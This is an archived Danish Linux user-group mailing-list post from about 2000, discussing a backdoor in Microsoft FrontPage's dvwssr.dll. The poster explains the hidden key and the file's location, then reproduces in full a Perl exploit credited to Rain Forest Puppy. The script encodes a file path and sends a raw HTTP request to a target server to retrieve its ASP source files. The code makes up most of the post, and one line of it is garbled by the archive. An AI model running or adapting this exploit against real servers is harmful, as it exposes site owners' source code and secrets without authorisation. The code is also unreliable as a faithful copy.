[an error occurred while processing this directive] [an error occurred while processing this directive][an error occurred while processing this directive] [an error occurred while processing this directive] [an error occurred while processing this directive] [an error occurred while processing this directive] (none) [an error occurred while processing this directive] [an error occurred while processing this directive] [an error occurred while processing this directive] [an error occurred while processing this directive] [an error occurred while processing this directive][an error occurred while processing this directive] [an error occurred while processing this directive][an error occurred while processing this directive] [an error occurred while processing this directive][an error occurred while processing this directive] [an error occurred while processing this directive] [an error occurred while processing this directive] [an error occurred while processing this directive] (none) [an error occurred while processing this directive] [an error occurred while processing this directive] [an error occurred while processing this directive][an error occurred while processing this directive]
 
[an error occurred while processing this directive] [an error occurred while processing this directive]
Skåne Sjælland Linux User Group - http://www.sslug.dk Home   Subscribe   Mail Archive   Forum   Calendar   Search
MhonArc Date: [Date Prev] [Date Index] [Date Next]   Thread: [Date Prev] [Thread Index] [Date Next]   MhonArc
 

Re: [ITPOLITIK] Bagdør i MS program.




René Seindal skriver:
> 
> Carsten Svaneborg wrote:
> >
> > Mads Bondo Dydensborg wrote:
> > > Er der nogen der har kontakt til nogen af dem i sikkerhedsrådet?
> > > Vi _bør_ næsten følge op på det her.
> >
> > Er der nogen der har snaget i den dll fil hvor bagdøren er?
> > Det kunne jo sjovt at vide hvad den er.
> 
> På linuxtoday.com er der en artikel af ESR, der førte til en del debat.
> I nogen af indlæggende blev det fremført, at det i virkeligheden drejede
> sig om en fejlkonfigureret NT boks, men at det alligevel er skræmmende
> at MS ikke har bedre kontrol over tingene, end at de indrømmede
> muligheden.
> 
> Jeg tror, at sagen skal researches grundigere, før man bruger den for
> alvor. Man risikerer, at det giver bagslag på langt sigt, hvis vi råber
> 'ulven kommer' hele tiden, uden at der er hold i det.

Så vidt jeg ved handler denne sag ikke kun om en fejlkonfigureret NT
box, men rent faktisk om en konkret bagdør! 
Det handler om ISAPI filen dvwssr.dll som ligger i /_vti_bin/_vti_aut/,
og som giver en adgang til at læse enhver ASP fil på serveren hvis man
bare kender passwordet (som jo nu er kommet frem).
Filen har intet rogtigt formål, med mindre man benytter dden gamle
InterDev 1.0, der benytter filens link-tjecker funktion.
Det vides ikke helt om det er MS selv eller om det er Vemeer
Technologies Inc. (som oprindeligt opfandt Frontpage systemet) der har
lavet bagdøren, men under alle omstendigheder så har MS givet lov til at
den blive meddistribueret! 

sætningen "Netscape engineers are weenies!" står bagvendt i filen i
cleartext, og kan derfor læses med en hexeditor eller lignende, og det
var ligesom det der satte hele efterforskningen igang! 

Dette har endt op med en simpel Exploit som er lavet af "Rain Forest
Puppy" der også var med til at finde fejlen sammen med Alf Serer!
her er lidt exploit kode at kigge på ! 
Der benyttes en simpel 62 caracter slide-rule encoding, så det er ikke
det helt vilde :o) 

#!/usr/bin/perl
# dvwssr.pl by rain forest puppy (only tested on Linux, as usual)
#
# Usage: dvwssr.pl target_host /file/to/retrieve/source
#
use Socket;

$ip=$ARGV[0];
$file=$ARGV[1];

print "Encoding to: ".encodefilename($file)."\n";
$url="GET /_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($file)."
HTTP/1.0\n\n";
print sendraw($url);

sub encodefilename {
my $from=shift;
my
$slide="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
#
#

my $key="Netscape engineers are weenies!";

#
#
my $kc=length($from);
my ($fv,$kv,$tmp,$to,$lett);
 @letts=split(//,$from);
 foreach $lett (@letts){
  $fv=index $slide, $lett;
  $fv=index $slide, (substr $slide,62-$fv,1) if($fv>=0);
  $kv=index $slide, substr $key, $kc, 1;
  if($kv>=0 && $fv>=0){
   $tmp= $kv - $fv;
   if($tmp <0){$tmp +=62;}
   $to.=substr $slide, $tmp,1; } else {
   $to.=$lett;}
  if(++$kc >= length($key)){ $kc=0;}
 }return $to;}

sub sendraw {
        my ($pstr)sslug@sslug;
        my $target;
        $target= inet_aton($ip) || die("inet_aton problems");
        socket(S,2,1,getprotobyname('tcp')||0) || die("Socket
problems\n");
        if(connect(S,pack "SnA4x8",2,80,$target)){
                select(S);              $|=1;
                print $pstr;            my @in=<S>;
                select(STDOUT);         close(S);
                return @in;
        } else { die("Can't connect...\n"); }}




-- 
-
 MVH
   Kim schulz
========================================================================
|                 ADICT Kode Slave - www.adict.net                     |
|            Dansk Linux Link Database - www.LinuXia.dk                |
========================================================================
              Sleep is just a cheap substitute for coffee     
     Fast, reliable, cheap - pick any two - [Microsoft in a Nutshell]


 
Home   Subscribe   Mail Archive   Index   Calendar   Search

 
 
Questions about the web-pages to <www_admin>. Last modified 2005-08-10, 20:11 CEST [an error occurred while processing this directive]
This page is maintained by [an error occurred while processing this directive]MHonArc [an error occurred while processing this directive] # [an error occurred while processing this directive] *